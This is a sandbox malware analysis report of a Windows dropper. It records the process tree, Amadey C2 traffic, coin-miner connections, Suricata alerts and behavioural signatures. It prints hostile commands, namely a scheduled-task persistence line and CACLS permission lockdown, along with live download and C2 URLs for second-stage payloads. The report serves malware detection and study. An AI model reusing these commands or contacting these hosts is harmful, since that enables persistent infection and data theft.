Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 16, 2023, 9:42 a.m.	Oct. 16, 2023, 9:45 a.m.

Size	4.3MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`5678c3a93dafcd5ba94fd33528c62276`
SHA256	`2d620c7feb27b4866579c6156df1ec547bfc22ad0aef00752ea8c6b083b8b73d`
CRC32	`ADC1FFB0`
ssdeep	`98304:wPV7xffhhY8gFARZhPbY9qyC+KU/2fHIZvrRpOTx+qgm1g4DZoYP:wPdJHKsrPJD+KXIZvrRaUQRDZH`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Is_DotNET_EXE - (no description)

newrock.exe "C:\Users\test22\AppData\Local\Temp\newrock.exe"
2544
- 31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2636
- oldplayer.exe "C:\Users\test22\AppData\Local\Temp\oldplayer.exe"
  2680
  - oneetx.exe "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe"
    2812
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
      2904
    - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
      2956
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        3036
      - cacls.exe CACLS "oneetx.exe" /P "test22:N"
        744
      - cacls.exe CACLS "oneetx.exe" /P "test22:R" /E
        1384
      - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2064
      - cacls.exe CACLS "..\207aa4515d" /P "test22:N"
        2192
      - cacls.exe CACLS "..\207aa4515d" /P "test22:R" /E
        2228
    - toolspub2.exe "C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe"
      2508
      - toolspub2.exe "C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe"
        2532
    - latestX.exe "C:\Users\test22\AppData\Local\Temp\1000521001\latestX.exe"
      2624
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
xmr-eu1.nanopool.org	A 51.15.58.224 A 51.255.34.118 A 51.68.143.81 A 212.47.253.124 A 163.172.154.142 A 51.15.65.182 A 135.125.238.108 A 51.15.193.130 A 51.68.190.80	212.47.253.124
pastebin.com	A 104.20.67.143 A 172.67.34.170 A 104.20.68.143	104.20.68.143
galandskiyher5.com	A 194.169.175.127	194.169.175.127

IP Address	Status	Action
104.20.67.143	Active	Moloch
164.124.101.2	Active	Moloch
194.169.175.127	Active	Moloch
5.42.65.80	Active	Moloch
51.15.193.130	Active	Moloch
51.15.58.224	Active	Moloch
79.137.192.18	Active	Moloch
95.214.27.254	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49179 -> 5.42.65.80:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 5.42.65.80:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 5.42.65.80:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49171 -> 5.42.65.80:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 5.42.65.80:80	2044695	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M1	A Network Trojan was detected
TCP 192.168.56.101:49171 -> 5.42.65.80:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49171 -> 5.42.65.80:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49180 -> 95.214.27.254:80	2017679	ET HUNTING SUSPICIOUS winlog.exe in URI Probable Process Dump/Trojan Download	A Network Trojan was detected
TCP 192.168.56.101:49180 -> 95.214.27.254:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 95.214.27.254:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 194.169.175.127:80 -> 192.168.56.101:49174	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 194.169.175.127:80 -> 192.168.56.101:49174	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 95.214.27.254:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49181 -> 79.137.192.18:80	2017598	ET MALWARE Possible Kelihos.F EXE Download Common Structure	A Network Trojan was detected
TCP 192.168.56.101:49181 -> 79.137.192.18:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 79.137.192.18:80 -> 192.168.56.101:49181	2014819	ET INFO Packed Executable Download	Misc activity
TCP 79.137.192.18:80 -> 192.168.56.101:49181	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 79.137.192.18:80 -> 192.168.56.101:49181	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 79.137.192.18:80 -> 192.168.56.101:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49179 -> 5.42.65.80:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 5.42.65.80:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 5.42.65.80:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 5.42.65.80:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49186 -> 104.20.67.143:443	906200068	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (CoinMiner)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.3 192.168.56.101:49185 51.15.58.224:14433	None	None	None
TLS 1.3 192.168.56.101:49186 104.20.67.143:443	None	None	None
TLS 1.3 192.168.56.101:49187 51.15.193.130:14433	None	None	None

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Oct. 16, 2023, 9:42 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 16, 2023, 9:42 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:42 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:43 a.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 16, 2023, 9:42 a.m.	buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 16, 2023, 9:42 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 16, 2023, 9:42 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:42 a.m.	buffer: r console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 16, 2023, 9:42 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 16, 2023, 9:42 a.m.	stacktrace: CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72951194 LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72822ba1 0x5b04c9 0x5b03d3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7415f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xe0434f4e exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 3730960 registers.edi: 0 registers.eax: 3730960 registers.ebp: 3731040 registers.edx: 0 registers.ebx: 7457456 registers.esi: 7182120 registers.ecx: 2541025087	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 16, 2023, 9:42 a.m.

stacktrace:

CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72951194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72822ba1
0x5b04c9
0x5b03d3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7415f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741d7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741d4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 3730960
registers.edi: 0
registers.eax: 3730960
registers.ebp: 3731040
registers.edx: 0
registers.ebx: 7457456
registers.esi: 7182120
registers.ecx: 2541025087

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://5.42.65.80/8bmeVwqx/index.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://galandskiyher5.com/downloads/toolspub2.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://95.214.27.254/getfile/taskhost.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://95.214.27.254/getfile/winlog.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://95.214.27.254/getfile/msedge.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://79.137.192.18/latestX.exe

Performs some HTTP requests (6 events)

request	POST http://5.42.65.80/8bmeVwqx/index.php
request	GET http://galandskiyher5.com/downloads/toolspub2.exe
request	GET http://95.214.27.254/getfile/taskhost.exe
request	GET http://95.214.27.254/getfile/winlog.exe
request	GET http://95.214.27.254/getfile/msedge.exe
request	GET http://79.137.192.18/latestX.exe

Sends data using the HTTP POST Method (1 event)

request

POST http://5.42.65.80/8bmeVwqx/index.php

Allocates read-write-execute memory (usually to unpack itself) (20 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00560000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4161536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b00000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2636 region_size: 9351168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:42 a.m.	process_identifier: 2680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:37 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Oct. 16, 2023, 9:43 a.m.	process_identifier: 2508 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 86016 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00650000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 9:43 a.m.	process_identifier: 2508 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Creates executable files on the filesystem (7 events)

file	C:\Users\test22\AppData\Local\Temp\1000521001\latestX.exe
file	C:\Users\test22\AppData\Local\Temp\1000397001\taskhost.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\1000399001\msedge.exe
file	C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe
file	C:\Users\test22\AppData\Local\Temp\oldplayer.exe
file	C:\Users\test22\AppData\Local\Temp\1000398001\winlog.exe

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\oldplayer.exe
file	C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe
file	C:\Users\test22\AppData\Local\Temp\1000521001\latestX.exe

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\oldplayer.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 16, 2023, 9:42 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe	1	1
ShellExecuteExW Oct. 16, 2023, 9:42 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Oct. 16, 2023, 9:42 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Oct. 16, 2023, 9:42 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000519001\toolspub2.exe	1	1
ShellExecuteExW Oct. 16, 2023, 9:43 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000521001\latestX.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000521001\latestX.exe	1	1

An executable file was downloaded by the process oneetx.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Oct. 16, 2023, 9:42 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $PÑäJ1¿·J1¿·J1¿·Tc;·l1¿·Tc·Y1¿·Tc<·+1¿·m÷Ä·G1¿·J1¾·Ì1¿·Tc5·K1¿·Tc+·K1¿·Tc.·K1¿·RichJ1¿·PEL½Úbà Ä> @ðvRìø:À, 0-@ä.textd `.dataä_ @À.rsrcø:<&@@.reloc&À(b@Bð´ÎºÊÞü&>P`\|¬ÀÖæø @ V l ° À Ò ö 0HXf~²ÊØäô.8VHtâ \8&LXj\| ¸ÂÔèö0D`~¬ºÒê2BThp\|°Êâü6Lfvª¼äðX~r2É;@YE@Lw@è´@¡@î¹@ýw@,Ñe;p-p!bad allocationÌ-@8@8@Unknown exceptionà-@²<@ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocCorExitProcessmscoree.dllruntime error TLOSS error SING error DOMAIN error R6034 An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 